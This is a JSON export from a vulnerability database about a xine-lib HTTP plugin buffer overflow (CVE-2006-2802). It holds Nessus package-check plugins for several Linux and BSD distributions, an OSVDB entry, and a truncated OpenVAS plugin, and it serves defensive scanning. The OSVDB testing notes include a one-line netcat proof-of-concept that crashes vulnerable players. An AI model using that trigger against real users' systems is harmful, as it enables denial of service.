ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21700);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2013/06/21 23:43:35 $\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"Secunia\", value:\"20369\");\n\n script_name(english:\"FreeBSD : libxine -- buffer overflow vulnerability (107e2ee5-f941-11da-b1fa-020039488e34)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Secunia Advisory reports :\n\nFederico L. Bossi Bonin has discovered a weakness in xine-lib, which\ncan be exploited by malicious people to crash certain applications on\na user's system.\n\nThe weakness is cause due to a heap corruption within the\n'xineplug_inp_http.so' plugin when handling an overly large reply from\nthe HTTP server. This can be exploited to crash an application that\nuses the plugin (e.g. gxine).\"\n );\n # http://www.freebsd.org/ports/portaudit/107e2ee5-f941-11da-b1fa-020039488e34.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0ec40fd0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libxine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2013 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"libxine<1.1.1_6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:02:00", "references": [], "pluginID": "21752", "description": "A buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated using gxine 0.5.6. (CVE-2006-2802)\n\nIn addition, a possible buffer overflow exists in the AVI demuxer, similar in nature to CVE-2006-1502 for MPlayer. The Corporate 3 release of xine-lib does not have this issue.\n\nThe updated packages have been patched to correct these issues.", "edition": 5, "reporter": "Tenable", "published": "2006-06-24T00:00:00", "title": "Mandrake Linux Security Advisory : xine-lib (MDKSA-2006:108)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:xine-gnomevfs", "p-cpe:/a:mandriva:linux:libxine1", "p-cpe:/a:mandriva:linux:xine-smb", "p-cpe:/a:mandriva:linux:xine-plugins", "p-cpe:/a:mandriva:linux:lib64xine1-devel", "p-cpe:/a:mandriva:linux:xine-flac", "p-cpe:/a:mandriva:linux:xine-esd", "p-cpe:/a:mandriva:linux:xine-arts", "p-cpe:/a:mandriva:linux:xine-dxr3", "cpe:/o:mandriva:linux:2006", "p-cpe:/a:mandriva:linux:libxine1-devel", "p-cpe:/a:mandriva:linux:lib64xine1", "x-cpe:/o:mandrakesoft:mandrake_linux:le2005", "p-cpe:/a:mandriva:linux:xine-polyp", "p-cpe:/a:mandriva:linux:xine-aa", "p-cpe:/a:mandriva:linux:xine-image"], "id": "MANDRAKE_MDKSA-2006-108.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=21752", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:108. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21752);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/07/19 20:59:14\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"MDKSA\", value:\"2006:108\");\n\n script_name(english:\"Mandrake Linux Security Advisory : xine-lib (MDKSA-2006:108)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for\nxine-lib 1.1.1 allows remote attackers to cause a denial of service\n(application crash) via a long reply from an HTTP server, as\ndemonstrated using gxine 0.5.6. (CVE-2006-2802)\n\nIn addition, a possible buffer overflow exists in the AVI demuxer,\nsimilar in nature to CVE-2006-1502 for MPlayer. The Corporate 3\nrelease of xine-lib does not have this issue.\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xine1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xine1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxine1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxine1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-aa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-arts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-dxr3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-esd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-flac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-image\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-polyp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-smb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64xine1-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64xine1-devel-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libxine1-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libxine1-devel-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-aa-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-arts-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-dxr3-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-esd-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-flac-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-gnomevfs-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-plugins-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-polyp-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-smb-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64xine1-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64xine1-devel-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libxine1-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libxine1-devel-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-aa-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-arts-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-dxr3-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-esd-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-flac-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-gnomevfs-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-image-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-plugins-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-polyp-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-smb-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:44:14", "references": ["http://www.debian.org/security/2006/dsa-1105", "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=369876"], "pluginID": "22647", "description": "Federico L. Bossi Bonin discovered a buffer overflow in the HTTP Plugin in xine-lib, the xine video/media player library, that could allow a remote attacker to cause a denial of service.", "edition": 6, "reporter": "Tenable", "published": "2006-10-14T00:00:00", "title": "Debian DSA-1105-1 : xine-lib - buffer overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802"], "modified": "2018-07-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:xine-lib", "cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-1105.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22647", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1105. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22647);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/07/20 2:17:12\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"DSA\", value:\"1105\");\n\n script_name(english:\"Debian DSA-1105-1 : xine-lib - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Federico L. Bossi Bonin discovered a buffer overflow in the HTTP\nPlugin in xine-lib, the xine video/media player library, that could\nallow a remote attacker to cause a denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=369876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1105\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libxine packages.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 0.9.8-2woody5.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.0.1-1sarge3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libxine-dev\", reference:\"0.9.8-2woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxine0\", reference:\"0.9.8-2woody5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libxine-dev\", reference:\"1.0.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libxine1\", reference:\"1.0.1-1sarge3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:10:56", "references": ["http://www.nessus.org/u?380bb21c"], "pluginID": "22101", "description": "New xine-lib packages are available for Slackware 10.2 and -current to fix security issues.", "edition": 4, "reporter": "Tenable", "published": "2006-07-28T00:00:00", "title": "Slackware 10.2 / current : xine-lib (SSA:2006-207-04)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802", "CVE-2005-4048"], "modified": "2015-03-19T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:xine-lib", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.2"], "id": "SLACKWARE_SSA_2006-207-04.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22101", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2006-207-04. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22101);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:18:22 $\");\n\n script_cve_id(\"CVE-2005-4048\", \"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"SSA\", value:\"2006-207-04\");\n\n script_name(english:\"Slackware 10.2 / current : xine-lib (SSA:2006-207-04)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New xine-lib packages are available for Slackware 10.2 and -current\nto fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.391759\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?380bb21c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xine-lib package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:xine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"10.2\", pkgname:\"xine-lib\", pkgver:\"1.1.2\", pkgarch:\"i686\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"xine-lib\", pkgver:\"1.1.2\", pkgarch:\"i686\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in xine-lib. The xineplug_inp_http.so library fails to properly check bounds for HTTP responses resulting in a buffer overflow. By tricking a victim into opening an HTTP link to a malicious website, an attacker can cause arbitary code execution on the victim\\'s system resulting in a loss of integrity.\n## Technical Description\nApplications that use a vulnerable version of the library may also be affected.\n## Solution Description\nUpgrade to cvs version (after 2006-05-31) or version 1.1.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in xine-lib. The xineplug_inp_http.so library fails to properly check bounds for HTTP responses resulting in a buffer overflow. By tricking a victim into opening an HTTP link to a malicious website, an attacker can cause arbitary code execution on the victim\\'s system resulting in a loss of integrity.\n## Manual Testing Notes\nperl -e 'print \"A\"x\"9500\"' | nc -lp 8080\nand then open \"xine http://localhost:8080/foo.mpg\"\n## References:\nVendor URL: http://xinehq.de/\nVendor Specific Solution URL: http://sourceforge.net/mailarchive/forum.php?thread_id=11077232&forum_id=11923\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:108)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1105)\n[Vendor Specific Advisory URL](http://sourceforge.net/mailarchive/forum.php?thread_id=11076540&forum_id=7131)\n[Secunia Advisory ID:20369](https://secuniaresearch.flexerasoftware.com/advisories/20369/)\n[Secunia Advisory ID:20766](https://secuniaresearch.flexerasoftware.com/advisories/20766/)\n[Secunia Advisory ID:20828](https://secuniaresearch.flexerasoftware.com/advisories/20828/)\n[Secunia Advisory ID:20942](https://secuniaresearch.flexerasoftware.com/advisories/20942/)\n[Secunia Advisory ID:20549](https://secuniaresearch.flexerasoftware.com/advisories/20549/)\n[Secunia Advisory ID:21919](https://secuniaresearch.flexerasoftware.com/advisories/21919/)\nOther Advisory URL: http://www.securiteam.com/unixfocus/5JP0W0AIKA.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-08.xml\nOther Advisory URL: http://www.ubuntu.com/usn/usn-295-1\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Jun/0008.html\nGeneric Exploit URL: http://milw0rm.com/exploits/1852\n[CVE-2006-2802](https://vulners.com/cve/CVE-2006-2802)\nBugtraq ID: 18187\n", "reporter": "Federico L. Bossi Bonin(fbossi@netcomm.com.ar)", "published": "2006-05-30T10:50:10", "title": "xine-lib xineplug_inp_http.so HTTP Response Remote Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "xine-lib", "version": "1.1.1", "operator": "eq"}, {"name": "xine-lib", "version": "1.0.2", "operator": "eq"}, {"name": "xine-lib", "version": "1.1.0", "operator": "eq"}, {"name": "xine-lib", "version": "1.0.1", "operator": "eq"}], "cvelist": ["CVE-2006-2802"], "modified": "2006-05-30T10:50:10", "href": "https://vulners.com/osvdb/OSVDB:25936", "id": "OSVDB:25936", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:26", "references": [], "pluginID": "56933", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "FreeBSD Ports: libxine", "type": "openvas", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802"], "modified": "2016-09-21T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56933", "id": "OPENVAS:56933", "sourceData": "#\n#VID 107e2ee5-f941-11da-b1fa-020039488e34\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: libxine\n\nCVE-2006-2802\nBuffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib\n1.1.1 allows remote attackers to cause a denial of service\n(application crash) via a long reply from an HTTP server, as\ndemonstrated using gxine 0.5.6.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/20369\nhttp://www.vuxml.org/freebsd/107e2ee5-f941-11da-b1fa-020039488e34.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56933);\n script_version(\"$Revision: 4125 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-21 07:39:51 +0200 (Wed, 21 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: libxine\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : 